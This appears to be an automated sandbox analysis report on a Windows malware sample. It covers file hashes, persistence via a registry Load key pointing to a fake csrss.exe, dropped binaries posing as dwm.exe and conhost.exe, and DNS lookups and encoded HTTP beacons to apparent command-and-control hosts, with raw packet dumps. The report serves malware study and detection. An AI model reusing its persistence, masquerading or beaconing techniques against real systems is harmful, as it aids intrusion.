Analysis Date2014-08-31 13:01:17
MD52e2fd8436ae556f5ba10c84772bf7713
SHA195ac4d3f7c76e3551b6f8cd54a069d2ed8a50ee4

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: a5973cc8cb5fb68506c34cf0b40b4dc3 sha1: a3576ef0b4b6b959e7c34659127fa46157572828 size: 101376
Section.rdata md5: 3cd1116d263be9b2b702d24b8dff7dd4 sha1: 1d32a1ec05ab87058f024603d69a1ba3b132e317 size: 2048
Section.data md5: fe7f44138fd6674f82d540ccd2e9a587 sha1: 46849011c670e636fb73534123bc4a7c42966475 size: 60928
Section.isete md5: f21599ccc2aa256f81bf488df617a518 sha1: fe70897d3e2740c5b53a5fea82ce01011c1b9430 size: 1024
Timestamp2005-09-02 21:40:55
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1134
PEhash1e58969d6275beffd946238016fc04901f2422e9
IMPhash14a88fda94bba4aef39d2d7b6c1bd598

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSguitarvideoshool.com
Winsock DNS127.0.0.1
Winsock DNShealthylifenow.com
Winsock DNSmyaquashoponline.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNShealthylifenow.com
Type: A
208.109.208.147
DNSzonetf.com
Type: A
141.8.225.80
DNSzonetf.com
Type: A
141.8.225.80
DNSguitarvideoshool.com
Type: A
DNSmyaquashoponline.com
Type: A
HTTP GEThttp://healthylifenow.com/templates/7349/images/header_logo.jpg?v50=66&tq=gKZEtzyM5x%2BpfOCPZY40YRpMRrO8geURx5cyg1GTfQvsYZ4qUHJkcOWQe0h3ShBmc2hn1gLvGtnZUe%2BTi9EXTxWeQPAQpzC%2B%2FQUThEnI1vuYaGd0Ljx3Gfwcujyvv7gBgt8gtIhG1%2FMRx4czXhWr%2BDs0CZ%2F8qiiXI1h1hVCSOFKsidD6Ne9bADTNSYvfjPRp%2FRL6FSRSIovR1dbw2DtvXHsOoJLAirzdNpDXgoWvqREpyfr9a3vPK4%2FhKUaHueSc5kQ08%2BZR%2BnQagM7IBjKjg%2BVtAgldRP2PMq75f9jhKTbNJLU7zuGTiA0aUVyoRnlcOlLOSN7FX8trzF893BrHYnnQMdLS3NptH6IbdVpntLPani93XECoKaz3yd4BLpKo%2FU6JH9
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 208.109.208.147:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f74656d 706c6174 65732f37   GET /templates/7
0x00000010 (00016)   3334392f 696d6167 65732f68 65616465   349/images/heade
0x00000020 (00032)   725f6c6f 676f2e6a 70673f76 35303d36   r_logo.jpg?v50=6
0x00000030 (00048)   36267471 3d674b5a 45747a79 4d357825   6&tq=gKZEtzyM5x%
0x00000040 (00064)   32427066 4f43505a 59343059 52704d52   2BpfOCPZY40YRpMR
0x00000050 (00080)   724f3867 65555278 35637967 31475466   rO8geURx5cyg1GTf
0x00000060 (00096)   51767359 5a347155 484a6b63 4f575165   QvsYZ4qUHJkcOWQe
0x00000070 (00112)   30683353 68426d63 32686e31 674c7647   0h3ShBmc2hn1gLvG
0x00000080 (00128)   746e5a55 65253242 54693945 58547857   tnZUe%2BTi9EXTxW
0x00000090 (00144)   65515041 51707a43 25324225 32465155   eQPAQpzC%2B%2FQU
0x000000a0 (00160)   5468456e 49317675 59614764 304c6a78   ThEnI1vuYaGd0Ljx
0x000000b0 (00176)   33476677 63756a79 76763767 42677438   3Gfwcujyvv7gBgt8
0x000000c0 (00192)   67744968 47312532 464d5278 34637a58   gtIhG1%2FMRx4czX
0x000000d0 (00208)   68577225 32424473 30435a25 32463871   hWr%2BDs0CZ%2F8q
0x000000e0 (00224)   69695849 31683168 5643534f 464b7369   iiXI1h1hVCSOFKsi
0x000000f0 (00240)   6444364e 65396241 44544e53 5976666a   dD6Ne9bADTNSYvfj
0x00000100 (00256)   50527025 3246524c 36465352 53496f76   PRp%2FRL6FSRSIov
0x00000110 (00272)   52316462 77324474 76584873 4f6f4a4c   R1dbw2DtvXHsOoJL
0x00000120 (00288)   4169727a 644e7044 58676f57 76715245   AirzdNpDXgoWvqRE
0x00000130 (00304)   70796672 39613376 504b3425 3246684b   pyfr9a3vPK4%2FhK
0x00000140 (00320)   55614875 65536335 6b513038 2532425a   UaHueSc5kQ08%2BZ
0x00000150 (00336)   52253242 6e516167 4d374942 6a4b6a67   R%2BnQagM7IBjKjg
0x00000160 (00352)   25324256 7441676c 64525032 504d7137   %2BVtAgldRP2PMq7
0x00000170 (00368)   3566396a 684b5462 4e4a4c55 377a7547   5f9jhKTbNJLU7zuG
0x00000180 (00384)   54694130 61555679 6f526e6c 634f6c4c   TiA0aUVyoRnlcOlL
0x00000190 (00400)   4f534e37 46583874 727a4638 39334272   OSN7FX8trzF893Br
0x000001a0 (00416)   48596e6e 514d644c 53334e70 74483649   HYnnQMdLS3NptH6I
0x000001b0 (00432)   62645670 6e744c50 616e6939 33584543   bdVpntLPani93XEC
0x000001c0 (00448)   6f4b617a 33796434 424c704b 6f253246   oKaz3yd4BLpKo%2F
0x000001d0 (00464)   55364a48 39204854 54502f31 2e300d0a   U6JH9 HTTP/1.0..
0x000001e0 (00480)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x000001f0 (00496)   650d0a48 6f73743a 20686561 6c746879   e..Host: healthy
0x00000200 (00512)   6c696665 6e6f772e 636f6d0d 0a416363   lifenow.com..Acc
0x00000210 (00528)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000220 (00544)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x00000230 (00560)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e786c 4b763937 35586c6d   X%2BSNxlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a67 4d374942 6a4b6a67   ose....gM7IBjKjg
0x00000160 (00352)   25324256 7441676c 64525032 504d7137   %2BVtAgldRP2PMq7
0x00000170 (00368)   3566396a 684b5462 4e4a4c55 377a7547   5f9jhKTbNJLU7zuG
0x00000180 (00384)   54694130 61555679 6f526e6c 634f6c4c   TiA0aUVyoRnlcOlL
0x00000190 (00400)   4f534e37 46583874 727a4638 39334272   OSN7FX8trzF893Br
0x000001a0 (00416)   48596e6e 514d644c 53334e70 74483649   HYnnQMdLS3NptH6I
0x000001b0 (00432)   62645670 6e744c50 616e6939 33584543   bdVpntLPani93XEC
0x000001c0 (00448)   6f4b617a 33796434 424c704b 6f253246   oKaz3yd4BLpKo%2F
0x000001d0 (00464)   55364a48 39204854 54502f31 2e300d0a   U6JH9 HTTP/1.0..
0x000001e0 (00480)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x000001f0 (00496)   650d0a48 6f73743a 20686561 6c746879   e..Host: healthy
0x00000200 (00512)   6c696665 6e6f772e 636f6d0d 0a416363   lifenow.com..Acc
0x00000210 (00528)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000220 (00544)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x00000230 (00560)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a3e 0a20203c 6872202f 3e0a2020   ...>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a67 4d374942 6a4b6a67   ose....gM7IBjKjg
0x00000160 (00352)   25324256 7441676c 64525032 504d7137   %2BVtAgldRP2PMq7
0x00000170 (00368)   3566396a 684b5462 4e4a4c55 377a7547   5f9jhKTbNJLU7zuG
0x00000180 (00384)   54694130 61555679 6f526e6c 634f6c4c   TiA0aUVyoRnlcOlL
0x00000190 (00400)   4f534e37 46583874 727a4638 39334272   OSN7FX8trzF893Br
0x000001a0 (00416)   48596e6e 514d644c 53334e70 74483649   HYnnQMdLS3NptH6I
0x000001b0 (00432)   62645670 6e744c50 616e6939 33584543   bdVpntLPani93XEC
0x000001c0 (00448)   6f4b617a 33796434 424c704b 6f253246   oKaz3yd4BLpKo%2F
0x000001d0 (00464)   55364a48 39204854 54502f31 2e300d0a   U6JH9 HTTP/1.0..
0x000001e0 (00480)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x000001f0 (00496)   650d0a48 6f73743a 20686561 6c746879   e..Host: healthy
0x00000200 (00512)   6c696665 6e6f772e 636f6d0d 0a416363   lifenow.com..Acc
0x00000210 (00528)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000220 (00544)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x00000230 (00560)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a67 4d374942 6a4b6a67   .......gM7IBjKjg
0x00000160 (00352)   25324256 7441676c 64525032 504d7137   %2BVtAgldRP2PMq7
0x00000170 (00368)   3566396a 684b5462 4e4a4c55 377a7547   5f9jhKTbNJLU7zuG
0x00000180 (00384)   54694130 61555679 6f526e6c 634f6c4c   TiA0aUVyoRnlcOlL
0x00000190 (00400)   4f534e37 46583874 727a4638 39334272   OSN7FX8trzF893Br
0x000001a0 (00416)   48596e6e 514d644c 53334e70 74483649   HYnnQMdLS3NptH6I
0x000001b0 (00432)   62645670 6e744c50 616e6939 33584543   bdVpntLPani93XEC
0x000001c0 (00448)   6f4b617a 33796434 424c704b 6f253246   oKaz3yd4BLpKo%2F
0x000001d0 (00464)   55364a48 39204854 54502f31 2e300d0a   U6JH9 HTTP/1.0..
0x000001e0 (00480)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x000001f0 (00496)   650d0a48 6f73743a 20686561 6c746879   e..Host: healthy
0x00000200 (00512)   6c696665 6e6f772e 636f6d0d 0a416363   lifenow.com..Acc
0x00000210 (00528)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000220 (00544)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x00000230 (00560)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7856 4b763937 35586c6d   X%2BSNxVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a72202f 3e0a2020   ose......r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a755825 3242534e 78623579 676d3143   JuX%2BSNxb5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
